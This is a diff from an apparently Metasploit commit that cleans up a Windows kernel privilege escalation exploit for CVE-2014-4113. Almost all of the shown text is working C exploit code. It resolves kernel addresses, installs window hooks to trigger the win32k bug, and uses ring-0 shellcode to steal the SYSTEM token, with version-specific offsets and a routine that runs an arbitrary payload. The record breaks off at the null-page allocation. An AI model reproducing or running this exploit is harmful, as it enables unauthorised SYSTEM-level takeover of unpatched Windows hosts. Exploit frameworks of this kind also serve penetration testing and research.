Land #4082, @OJ's cleanup and improvements for CVE-2014-4113
commit
c1b82bac0e
Binary file not shown.
Binary file not shown.
|
@ -1,9 +1,9 @@
|
||||||
|
|
||||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||||
# Visual Studio Express 2013 for Windows Desktop
|
# Visual Studio 2013
|
||||||
VisualStudioVersion = 12.0.30723.0
|
VisualStudioVersion = 12.0.21005.1
|
||||||
MinimumVisualStudioVersion = 10.0.40219.1
|
MinimumVisualStudioVersion = 10.0.40219.1
|
||||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2014-4113", "cve-2014-4113\cve-2014-4113.vcxproj", "{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}"
|
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2014-4113", "cve-2014-4113\cve-2014-4113.vcxproj", "{E80F11CD-6698-492F-B4B0-1A2348A24BB0}"
|
||||||
EndProject
|
EndProject
|
||||||
Global
|
Global
|
||||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||||
|
@ -13,14 +13,14 @@ Global
|
||||||
Release|x64 = Release|x64
|
Release|x64 = Release|x64
|
||||||
EndGlobalSection
|
EndGlobalSection
|
||||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||||
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.ActiveCfg = Debug|Win32
|
{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||||
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.Build.0 = Debug|Win32
|
{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|Win32.Build.0 = Debug|Win32
|
||||||
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|x64.ActiveCfg = Debug|x64
|
{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|x64.ActiveCfg = Debug|x64
|
||||||
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|x64.Build.0 = Debug|x64
|
{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|x64.Build.0 = Debug|x64
|
||||||
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.ActiveCfg = Release|Win32
|
{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|Win32.ActiveCfg = Release|Win32
|
||||||
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.Build.0 = Release|Win32
|
{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|Win32.Build.0 = Release|Win32
|
||||||
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|x64.ActiveCfg = Release|x64
|
{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|x64.ActiveCfg = Release|x64
|
||||||
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|x64.Build.0 = Release|x64
|
{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|x64.Build.0 = Release|x64
|
||||||
EndGlobalSection
|
EndGlobalSection
|
||||||
GlobalSection(SolutionProperties) = preSolution
|
GlobalSection(SolutionProperties) = preSolution
|
||||||
HideSolutionNode = FALSE
|
HideSolutionNode = FALSE
|
||||||
|
|
|
@ -2,6 +2,9 @@
|
||||||
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
|
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
|
||||||
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
|
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
|
||||||
|
|
||||||
|
// Uncomment this line to enable to debug output
|
||||||
|
//#define DEBUGGING
|
||||||
|
|
||||||
// Purloined from ntstatus.h
|
// Purloined from ntstatus.h
|
||||||
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth
|
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth
|
||||||
|
|
||||||
|
@ -9,23 +12,17 @@
|
||||||
#include <windows.h>
|
#include <windows.h>
|
||||||
#undef WIN32_NO_STATUS
|
#undef WIN32_NO_STATUS
|
||||||
|
|
||||||
|
#ifdef DEBUGGING
|
||||||
|
// only needed because of the output printf stuff when debugging
|
||||||
|
#include <stdio.h>
|
||||||
|
#endif
|
||||||
|
|
||||||
#ifndef _NTDEF_
|
#ifndef _NTDEF_
|
||||||
typedef __success(return >= 0) LONG NTSTATUS;
|
typedef __success(return >= 0) LONG NTSTATUS;
|
||||||
typedef NTSTATUS *PNTSTATUS;
|
typedef NTSTATUS *PNTSTATUS;
|
||||||
#endif
|
#endif
|
||||||
|
|
||||||
#define DEBUGGING FALSE
|
#define PTR_SIZE sizeof(UINT_PTR)
|
||||||
|
|
||||||
#ifdef _M_X64
|
|
||||||
typedef unsigned __int64 QWORD;
|
|
||||||
typedef QWORD *PQWORD;
|
|
||||||
#endif
|
|
||||||
|
|
||||||
int WndProcClue = 0;
|
|
||||||
int HookCallbackClue = 0;
|
|
||||||
WNDPROC lpPrevWndFunc;
|
|
||||||
DWORD MyProcessId = 0;
|
|
||||||
DWORD OffsetWindows = 0;
|
|
||||||
|
|
||||||
typedef NTSTATUS(NTAPI *lNtAllocateVirtualMemory)(
|
typedef NTSTATUS(NTAPI *lNtAllocateVirtualMemory)(
|
||||||
IN HANDLE ProcessHandle,
|
IN HANDLE ProcessHandle,
|
||||||
|
@ -34,21 +31,22 @@ typedef NTSTATUS(NTAPI *lNtAllocateVirtualMemory)(
|
||||||
IN PSIZE_T RegionSize,
|
IN PSIZE_T RegionSize,
|
||||||
IN ULONG AllocationType,
|
IN ULONG AllocationType,
|
||||||
IN ULONG Protect
|
IN ULONG Protect
|
||||||
);
|
);
|
||||||
|
|
||||||
typedef NTSTATUS(NTAPI *lPsLookupProcessByProcessId)(
|
typedef NTSTATUS(NTAPI *lPsLookupProcessByProcessId)(
|
||||||
IN HANDLE ProcessId,
|
IN HANDLE ProcessId,
|
||||||
OUT PVOID Process
|
OUT PVOID Process
|
||||||
);
|
);
|
||||||
|
|
||||||
typedef NTSTATUS(NTAPI *lZwQuerySystemInformation)(
|
typedef NTSTATUS(NTAPI *lZwQuerySystemInformation)(
|
||||||
_In_ DWORD SystemInformationClass,
|
_In_ DWORD SystemInformationClass,
|
||||||
_Inout_ PVOID SystemInformation,
|
_Inout_ PVOID SystemInformation,
|
||||||
_In_ ULONG SystemInformationLength,
|
_In_ ULONG SystemInformationLength,
|
||||||
_Out_opt_ PULONG ReturnLength
|
_Out_opt_ PULONG ReturnLength
|
||||||
);
|
);
|
||||||
|
|
||||||
typedef struct _SYSTEM_MODULE {
|
typedef struct _SYSTEM_MODULE
|
||||||
|
{
|
||||||
HANDLE Reserved1;
|
HANDLE Reserved1;
|
||||||
PVOID Reserved2;
|
PVOID Reserved2;
|
||||||
PVOID ImageBaseAddress;
|
PVOID ImageBaseAddress;
|
||||||
|
@ -61,44 +59,60 @@ typedef struct _SYSTEM_MODULE {
|
||||||
BYTE Name[256];
|
BYTE Name[256];
|
||||||
} SYSTEM_MODULE, *PSYSTEM_MODULE;
|
} SYSTEM_MODULE, *PSYSTEM_MODULE;
|
||||||
|
|
||||||
|
typedef struct _SYSTEM_MODULE_INFORMATION
|
||||||
typedef struct _SYSTEM_MODULE_INFORMATION {
|
{
|
||||||
ULONG ModulesCount;
|
ULONG ModulesCount;
|
||||||
SYSTEM_MODULE Modules[0];
|
SYSTEM_MODULE Modules[0];
|
||||||
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
|
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
|
||||||
|
|
||||||
|
BOOL bWndProcFlag = FALSE;
|
||||||
|
BOOL bHookCallbackFlag = FALSE;
|
||||||
|
|
||||||
|
WNDPROC lpPrevWndFunc;
|
||||||
|
DWORD dwMyProcessId = 0;
|
||||||
|
DWORD dwOffsetWindows = 0;
|
||||||
|
|
||||||
lPsLookupProcessByProcessId pPsLookupProcessByProcessId = NULL;
|
lPsLookupProcessByProcessId pPsLookupProcessByProcessId = NULL;
|
||||||
lNtAllocateVirtualMemory pNtAllocateVirtualMemory = NULL;
|
lNtAllocateVirtualMemory pNtAllocateVirtualMemory = NULL;
|
||||||
|
|
||||||
|
#ifdef DEBUGGING
|
||||||
|
void dprintf(char* pszFormat, ...)
|
||||||
|
{
|
||||||
|
char s_acBuf[2048];
|
||||||
|
va_list args;
|
||||||
|
va_start(args, pszFormat);
|
||||||
|
vsprintf_s(s_acBuf, sizeof(s_acBuf) - 1, pszFormat, args);
|
||||||
|
OutputDebugString(s_acBuf);
|
||||||
|
va_end(args);
|
||||||
|
}
|
||||||
|
#else
|
||||||
|
#define dprintf(...)
|
||||||
|
#endif
|
||||||
|
|
||||||
long CALLBACK HookCallbackTwo(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
|
long CALLBACK hook_callback_two(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
|
||||||
{
|
{
|
||||||
EndMenu();
|
EndMenu();
|
||||||
return -5;
|
return -5;
|
||||||
}
|
}
|
||||||
|
|
||||||
LRESULT CALLBACK HookCallback(int code, WPARAM wParam, LPARAM lParam) {
|
LRESULT CALLBACK hook_callback(int code, WPARAM wParam, LPARAM lParam)
|
||||||
#ifdef _M_X64
|
{
|
||||||
if (*(DWORD *)(lParam + 16) == 0x1EB && !HookCallbackClue)
|
if (*(DWORD *)(lParam + PTR_SIZE * 2) == 0x1EB && !bHookCallbackFlag)
|
||||||
#else
|
|
||||||
if (*(DWORD *)(lParam + 8) == 0x1EB && !HookCallbackClue)
|
|
||||||
#endif
|
|
||||||
{
|
{
|
||||||
HookCallbackClue = 1;
|
bHookCallbackFlag = TRUE;
|
||||||
if (UnhookWindowsHook(WH_CALLWNDPROC, HookCallback)) {
|
if (UnhookWindowsHook(WH_CALLWNDPROC, hook_callback))
|
||||||
#ifdef _M_X64
|
{
|
||||||
lpPrevWndFunc = (WNDPROC)SetWindowLongPtr(*(HWND *)(lParam + 24), GWLP_WNDPROC, (ULONG_PTR)HookCallbackTwo);
|
lpPrevWndFunc = (WNDPROC)SetWindowLongPtrA(*(HWND *)(lParam + PTR_SIZE * 3), GWLP_WNDPROC, (ULONG_PTR)hook_callback_two);
|
||||||
#else
|
|
||||||
lpPrevWndFunc = (WNDPROC)SetWindowLongA(*(HWND *)(lParam + 12), GWLP_WNDPROC, (LONG)HookCallbackTwo);
|
|
||||||
#endif
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
return CallNextHookEx(0, code, wParam, lParam);
|
return CallNextHookEx(0, code, wParam, lParam);
|
||||||
}
|
}
|
||||||
|
|
||||||
LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
|
LRESULT CALLBACK wnd_proc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
|
||||||
if (msg == 289 && WndProcClue != 1) {
|
{
|
||||||
WndProcClue = 1;
|
if (msg == 289 && !bWndProcFlag)
|
||||||
|
{
|
||||||
|
bWndProcFlag = TRUE;
|
||||||
PostMessageA(hwnd, 256, 40, 0);
|
PostMessageA(hwnd, 256, 40, 0);
|
||||||
PostMessageA(hwnd, 256, 39, 0);
|
PostMessageA(hwnd, 256, 39, 0);
|
||||||
PostMessageA(hwnd, 513, 0, 0);
|
PostMessageA(hwnd, 513, 0, 0);
|
||||||
|
@ -106,380 +120,375 @@ LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
|
||||||
return DefWindowProc(hwnd, msg, wParam, lParam);
|
return DefWindowProc(hwnd, msg, wParam, lParam);
|
||||||
}
|
}
|
||||||
|
|
||||||
|
DWORD_PTR __stdcall get_threadinfo_ptr(void)
|
||||||
|
{
|
||||||
#ifdef _M_X64
|
#ifdef _M_X64
|
||||||
QWORD MyPtiCurrent(void) {
|
PBYTE pTeb = (PBYTE)__readgsqword(0x30);
|
||||||
void *teb = (void *)__readgsqword(0x30);
|
return (DWORD_PTR)*((PDWORD_PTR)(pTeb + 0x78));
|
||||||
QWORD Win32ThreadInfo = (QWORD)*((PQWORD)((PBYTE)teb + 0x78));
|
|
||||||
|
|
||||||
return Win32ThreadInfo;
|
|
||||||
}
|
|
||||||
#else
|
#else
|
||||||
DWORD __stdcall MyPtiCurrent() {
|
PBYTE pTeb = (PBYTE)__readfsdword(0x18);
|
||||||
__asm {
|
return (DWORD_PTR)*((PDWORD_PTR)(pTeb + 0x40));
|
||||||
mov eax, fs : 18h
|
|
||||||
mov eax, [eax + 40h]
|
|
||||||
}
|
|
||||||
}
|
|
||||||
#endif
|
#endif
|
||||||
|
}
|
||||||
|
|
||||||
int _stdcall shellcode_ring0(int one, int two, int three, int four) {
|
int _stdcall shellcode_ring0(int one, int two, int three, int four)
|
||||||
|
{
|
||||||
void *my_process_info = NULL;
|
void *my_process_info = NULL;
|
||||||
void *system_info = NULL;
|
void *system_info = NULL;
|
||||||
|
|
||||||
pPsLookupProcessByProcessId((HANDLE)MyProcessId, &my_process_info);
|
pPsLookupProcessByProcessId((HANDLE)dwMyProcessId, &my_process_info);
|
||||||
pPsLookupProcessByProcessId((HANDLE)4, &system_info);
|
pPsLookupProcessByProcessId((HANDLE)4, &system_info);
|
||||||
|
|
||||||
*(PDWORD)((PBYTE)my_process_info + OffsetWindows) = *(PDWORD)((PBYTE)system_info + OffsetWindows);
|
*(PDWORD)((PBYTE)my_process_info + dwOffsetWindows) = *(PDWORD)((PBYTE)system_info + dwOffsetWindows);
|
||||||
|
|
||||||
return 0;
|
return 0;
|
||||||
}
|
}
|
||||||
|
|
||||||
void
|
DWORD WINAPI execute_payload(LPVOID lpPayload)
|
||||||
LogMessage(char* pszFormat, ...) {
|
{
|
||||||
if (DEBUGGING != TRUE) {
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
static char s_acBuf[2048];
|
|
||||||
va_list args;
|
|
||||||
va_start(args, pszFormat);
|
|
||||||
vsprintf(s_acBuf, pszFormat, args);
|
|
||||||
printf("%s\n", s_acBuf);
|
|
||||||
OutputDebugString(s_acBuf);
|
|
||||||
va_end(args);
|
|
||||||
}
|
|
||||||
|
|
||||||
DWORD WINAPI ExecutePayload(LPVOID lpPayload) {
|
|
||||||
VOID(*lpCode)() = (VOID(*)())lpPayload;
|
VOID(*lpCode)() = (VOID(*)())lpPayload;
|
||||||
lpCode();
|
lpCode();
|
||||||
return ERROR_SUCCESS;
|
return ERROR_SUCCESS;
|
||||||
}
|
}
|
||||||
|
|
||||||
void Win32kNullPage(LPVOID lpPayload) {
|
void win32k_null_page(LPVOID lpPayload)
|
||||||
HWND hWnd;
|
{
|
||||||
WNDCLASSA WndClass;
|
WNDCLASSA wndClass;
|
||||||
LPBYTE promise_land = NULL;
|
char szNtName[256];
|
||||||
HMODULE hNtdll = NULL;
|
PVOID pNtBase;
|
||||||
HMODULE ntkrnl = NULL;
|
OSVERSIONINFOA versionInfo;
|
||||||
NTSTATUS status;
|
|
||||||
PULONG pSystemInfoBuffer = NULL;
|
|
||||||
lZwQuerySystemInformation pZwQuerySystemInformation = NULL;
|
|
||||||
ULONG SystemInfoBufferSize = 0;
|
|
||||||
char nt_name[256];
|
|
||||||
PVOID nt_base;
|
|
||||||
OSVERSIONINFOA VersionInformation;
|
|
||||||
|
|
||||||
// Getting Windows version
|
// Getting Windows version
|
||||||
LogMessage("[*] Getting Windows version...");
|
dprintf("[*] Getting Windows version...");
|
||||||
memset(&VersionInformation, 0, sizeof(OSVERSIONINFOA));
|
memset(&versionInfo, 0, sizeof(OSVERSIONINFOA));
|
||||||
VersionInformation.dwOSVersionInfoSize = 148;
|
versionInfo.dwOSVersionInfoSize = 148;
|
||||||
if (!GetVersionExA(&VersionInformation)) {
|
|
||||||
LogMessage("[!] Failed to get windows version");
|
if (!GetVersionExA(&versionInfo))
|
||||||
|
{
|
||||||
|
dprintf("[!] Failed to get windows version");
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
#ifdef _M_X64
|
#ifdef _M_X64
|
||||||
if (VersionInformation.dwMajorVersion == 6 && VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1
|
if (versionInfo.dwMajorVersion == 6 && versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 1)
|
||||||
LogMessage("[*] Windows 6.1 found...");
|
{
|
||||||
OffsetWindows = 0x208;
|
// Ex: Windows 7 SP1
|
||||||
|
dprintf("[*] Windows 6.1 found...");
|
||||||
|
dwOffsetWindows = 0x208;
|
||||||
}
|
}
|
||||||
#else
|
#else
|
||||||
if (VersionInformation.dwMajorVersion == 6) {
|
if (versionInfo.dwMajorVersion == 6)
|
||||||
if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1
|
{
|
||||||
LogMessage("[*] Windows 6.1 found...");
|
if (versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 1)
|
||||||
OffsetWindows = 0xf8;
|
{
|
||||||
|
// Ex: Windows 7 SP1
|
||||||
|
dprintf("[*] Windows 6.1 found...");
|
||||||
|
dwOffsetWindows = 0xf8;
|
||||||
}
|
}
|
||||||
else if (!VersionInformation.dwMinorVersion) {
|
else if (!versionInfo.dwMinorVersion)
|
||||||
LogMessage("[*] Windows 6.0 found..."); // Ex: Windows 2008 R2
|
{
|
||||||
OffsetWindows = 0xe0;
|
// Ex: Windows 2008 R2
|
||||||
|
dprintf("[*] Windows 6.0 found...");
|
||||||
|
dwOffsetWindows = 0xe0;
|
||||||
}
|
}
|
||||||
else {
|
else
|
||||||
LogMessage("[!] Unsupported Windows 6.%d found, only 6.0 and 6.1 supported atm", VersionInformation.dwMinorVersion);
|
{
|
||||||
|
dprintf("[!] Unsupported Windows 6.%d found, only 6.0 and 6.1 supported atm", versionInfo.dwMinorVersion);
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
else if (VersionInformation.dwMajorVersion == 5) {
|
else if (versionInfo.dwMajorVersion == 5)
|
||||||
if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows XP SP3
|
{
|
||||||
LogMessage("[*] Windows 5.1 found...");
|
if (versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 1)
|
||||||
OffsetWindows = 0xc8;
|
{
|
||||||
|
// Ex: Windows XP SP3
|
||||||
|
dprintf("[*] Windows 5.1 found...");
|
||||||
|
dwOffsetWindows = 0xc8;
|
||||||
}
|
}
|
||||||
else if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 2) { // Ex: Windows 2003 SP2
|
else if (versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 2)
|
||||||
LogMessage("[*] Windows 5.2 found...");
|
{
|
||||||
OffsetWindows = 0xd8;
|
// Ex: Windows 2003 SP2
|
||||||
|
dprintf("[*] Windows 5.2 found...");
|
||||||
|
dwOffsetWindows = 0xd8;
|
||||||
}
|
}
|
||||||
else {
|
else
|
||||||
LogMessage("[!] Unsupported Windows 5 found, only 5.1 and 5.2 supported atm");
|
{
|
||||||
|
dprintf("[!] Unsupported Windows 5 found, only 5.1 and 5.2 supported atm");
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
#endif
|
#endif
|
||||||
else {
|
else
|
||||||
LogMessage("[!] Major Version %d found, not supported", VersionInformation.dwMajorVersion);
|
{
|
||||||
|
dprintf("[!] Major Version %d found, not supported", versionInfo.dwMajorVersion);
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
// Solve symbols
|
// Solve symbols
|
||||||
LogMessage("[*] Solving symbols...");
|
dprintf("[*] Solving symbols...");
|
||||||
|
|
||||||
hNtdll = LoadLibraryA("ntdll");
|
HMODULE hNtdll = LoadLibraryA("ntdll");
|
||||||
if (hNtdll == NULL) {
|
if (hNtdll == NULL)
|
||||||
LogMessage("[!] Failed to Load ntdll...");
|
{
|
||||||
|
dprintf("[!] Failed to Load ntdll...");
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
pZwQuerySystemInformation = (lZwQuerySystemInformation)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
|
lZwQuerySystemInformation pZwQuerySystemInformation = (lZwQuerySystemInformation)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
|
||||||
if (pZwQuerySystemInformation == NULL) {
|
if (pZwQuerySystemInformation == NULL)
|
||||||
LogMessage("[!] Failed to solve ZwQuerySystemInformation");
|
{
|
||||||
|
dprintf("[!] Failed to solve ZwQuerySystemInformation");
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
pNtAllocateVirtualMemory = (lNtAllocateVirtualMemory)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
|
pNtAllocateVirtualMemory = (lNtAllocateVirtualMemory)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
|
||||||
if (pNtAllocateVirtualMemory == NULL) {
|
if (pNtAllocateVirtualMemory == NULL)
|
||||||
LogMessage("[!] Failed to solve NtAllocateVirtualMemory");
|
{
|
||||||
|
dprintf("[!] Failed to solve NtAllocateVirtualMemory");
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
LogMessage("[*] Requesting Kernel loaded modules...");
|
dprintf("[*] Requesting Kernel loaded modules...");
|
||||||
|
|
||||||
status = pZwQuerySystemInformation(11, &SystemInfoBufferSize, 0, &SystemInfoBufferSize);
|
ULONG ulSystemInfoBufferSize = 0;
|
||||||
|
pZwQuerySystemInformation(11, &ulSystemInfoBufferSize, 0, &ulSystemInfoBufferSize);
|
||||||
if (SystemInfoBufferSize == 0) {
|
if (ulSystemInfoBufferSize == 0)
|
||||||
LogMessage("[!] Requesting pZwQuerySystemInformation required length failed");
|
{
|
||||||
return;
|
dprintf("[!] Requesting pZwQuerySystemInformation required length failed");
|
||||||
}
|
|
||||||
else {
|
|
||||||
LogMessage("[*] pZwQuerySystemInformation required length %d", SystemInfoBufferSize);
|
|
||||||
}
|
|
||||||
|
|
||||||
pSystemInfoBuffer = (PULONG)LocalAlloc(LMEM_ZEROINIT, SystemInfoBufferSize);
|
|
||||||
if (pSystemInfoBuffer == NULL) {
|
|
||||||
LogMessage("[!] Allocation for SystemInfo failed");
|
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
status = pZwQuerySystemInformation(11, pSystemInfoBuffer, SystemInfoBufferSize, &SystemInfoBufferSize);
|
dprintf("[*] pZwQuerySystemInformation required length %d", ulSystemInfoBufferSize);
|
||||||
|
|
||||||
if (status != STATUS_SUCCESS) {
|
PULONG pSystemInfoBuffer = (PULONG)LocalAlloc(LMEM_ZEROINIT, ulSystemInfoBufferSize);
|
||||||
LogMessage("[!] Requesting kernel modules through ZwQuerySystemInformation failed");
|
if (pSystemInfoBuffer == NULL)
|
||||||
|
{
|
||||||
|
dprintf("[!] Allocation for SystemInfo failed");
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
if (pZwQuerySystemInformation(11, pSystemInfoBuffer, ulSystemInfoBufferSize, &ulSystemInfoBufferSize) != STATUS_SUCCESS)
|
||||||
|
{
|
||||||
|
dprintf("[!] Requesting kernel modules through ZwQuerySystemInformation failed");
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
LogMessage("[*] Parsing SYSTEM_INFO...");
|
dprintf("[*] Parsing SYSTEM_INFO...");
|
||||||
|
|
||||||
SYSTEM_MODULE_INFORMATION *smi = (SYSTEM_MODULE_INFORMATION *)pSystemInfoBuffer;
|
SYSTEM_MODULE_INFORMATION *smi = (SYSTEM_MODULE_INFORMATION *)pSystemInfoBuffer;
|
||||||
|
|
||||||
LogMessage("[*] %d Kernel modules found\n", smi->ModulesCount);
|
dprintf("[*] %d Kernel modules found", smi->ModulesCount);
|
||||||
|
|
||||||
memset(nt_name, 0, 256);
|
memset(szNtName, 0, 256);
|
||||||
|
|
||||||
int i = 0;
|
ULONG i = 0;
|
||||||
while (i < smi->ModulesCount) {
|
while (i < smi->ModulesCount)
|
||||||
|
{
|
||||||
SYSTEM_MODULE *sm = (SYSTEM_MODULE *)(smi->Modules + i);
|
SYSTEM_MODULE *sm = (SYSTEM_MODULE *)(smi->Modules + i);
|
||||||
LogMessage("[*] Checking module %s", sm->Name);
|
dprintf("[*] Checking module %s", sm->Name);
|
||||||
if (strstr((char *)sm->Name, ".exe")) {
|
if (strstr((char *)sm->Name, ".exe"))
|
||||||
|
{
|
||||||
char *start = strstr((char *)sm->Name, "nt");
|
char *start = strstr((char *)sm->Name, "nt");
|
||||||
if (start != NULL) {
|
if (start != NULL)
|
||||||
nt_base = sm->ImageBaseAddress;
|
{
|
||||||
strncpy_s(nt_name, 256, start, _TRUNCATE);
|
pNtBase = sm->ImageBaseAddress;
|
||||||
|
strncpy_s(szNtName, 256, start, _TRUNCATE);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
i++;
|
i++;
|
||||||
}
|
}
|
||||||
|
|
||||||
if (nt_name == NULL) {
|
if (szNtName == NULL)
|
||||||
LogMessage("[!] nt not found");
|
{
|
||||||
|
dprintf("[!] nt not found");
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
else {
|
dprintf("[*] Good! nt found as %s at 0x%08x", szNtName, pNtBase);
|
||||||
LogMessage("[*] Good! nt found as %s at 0x%08x", nt_name, nt_base);
|
|
||||||
}
|
|
||||||
|
|
||||||
ntkrnl = LoadLibraryA(nt_name);
|
HMODULE hNtKrnl = LoadLibraryA(szNtName);
|
||||||
|
|
||||||
LogMessage("[*] %s loaded in userspace at: %08x\n", nt_name, ntkrnl);
|
dprintf("[*] %s loaded in userspace at: %08x", szNtName, hNtKrnl);
|
||||||
|
|
||||||
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)GetProcAddress(ntkrnl, "PsLookupProcessByProcessId");
|
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)GetProcAddress(hNtKrnl, "PsLookupProcessByProcessId");
|
||||||
|
|
||||||
if (pPsLookupProcessByProcessId == NULL) {
|
if (pPsLookupProcessByProcessId == NULL)
|
||||||
LogMessage("[!] Failed to solve PsLookupProcessByProcessId\n");
|
{
|
||||||
|
dprintf("[!] Failed to solve PsLookupProcessByProcessId");
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
#ifdef _M_X64
|
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((DWORD_PTR)pNtBase + ((DWORD_PTR)pPsLookupProcessByProcessId - (DWORD_PTR)hNtKrnl));
|
||||||
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((QWORD)nt_base + ((QWORD)pPsLookupProcessByProcessId - (QWORD)ntkrnl));
|
dprintf("[*] pPsLookupProcessByProcessId in kernel: 0x%p", pPsLookupProcessByProcessId);
|
||||||
LogMessage("[*] pPsLookupProcessByProcessId in kernel: %016llx\n", pPsLookupProcessByProcessId);
|
|
||||||
#else
|
|
||||||
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((DWORD)nt_base + ((DWORD)pPsLookupProcessByProcessId - (DWORD)ntkrnl));
|
|
||||||
LogMessage("[*] pPsLookupProcessByProcessId in kernel: %08x\n", pPsLookupProcessByProcessId);
|
|
||||||
#endif
|
|
||||||
|
|
||||||
MyProcessId = GetCurrentProcessId();
|
dwMyProcessId = GetCurrentProcessId();
|
||||||
|
|
||||||
// Register Class
|
// Register Class
|
||||||
LogMessage("[*] Registering class...");
|
dprintf("[*] Registering class...");
|
||||||
|
|
||||||
memset(&WndClass, 0, sizeof(WNDCLASSA));
|
memset(&wndClass, 0, sizeof(WNDCLASSA));
|
||||||
WndClass.lpfnWndProc = WndProc; // Called with CallWindowProc => http://msdn.microsoft.com/en-us/library/windows/desktop/ms633571(v=vs.85).aspx
|
wndClass.lpfnWndProc = wnd_proc; // Called with CallWindowProc => http://msdn.microsoft.com/en-us/library/windows/desktop/ms633571(v=vs.85).aspx
|
||||||
WndClass.lpszClassName = "woqunimalegebi";
|
wndClass.lpszClassName = "woqunimalegebi";
|
||||||
|
|
||||||
if (RegisterClassA(&WndClass) == 0) {
|
if (!RegisterClassA(&wndClass))
|
||||||
LogMessage("[!] RegisterClassA failed ");
|
{
|
||||||
|
dprintf("[!] RegisterClassA failed ");
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
// Create Window
|
// Create Window
|
||||||
LogMessage("[*] Creating window...");
|
dprintf("[*] Creating window...");
|
||||||
hWnd = CreateWindowExA(0, "woqunimalegebi", NULL, 0, -1, -1, 0, 0, NULL, NULL, NULL, NULL);
|
HWND hWnd = CreateWindowExA(0, "woqunimalegebi", NULL, 0, -1, -1, 0, 0, NULL, NULL, NULL, NULL);
|
||||||
|
|
||||||
if (hWnd == NULL) {
|
if (hWnd == NULL)
|
||||||
LogMessage("[!] CreateWindowExA failed");
|
{
|
||||||
|
dprintf("[!] CreateWindowExA failed");
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
// Making everything ready for exploitation...
|
// Making everything ready for exploitation...
|
||||||
|
|
||||||
LogMessage("[*] Allocating null page...");
|
dprintf("[*] Allocating null page...");
|
||||||
#ifdef _M_X64
|
